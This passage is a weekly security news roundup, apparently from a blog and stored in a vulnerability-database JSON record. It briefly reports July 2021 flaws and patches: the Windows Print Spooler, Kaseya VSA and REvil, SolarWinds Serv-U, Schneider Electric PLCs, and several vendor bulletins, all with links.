Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
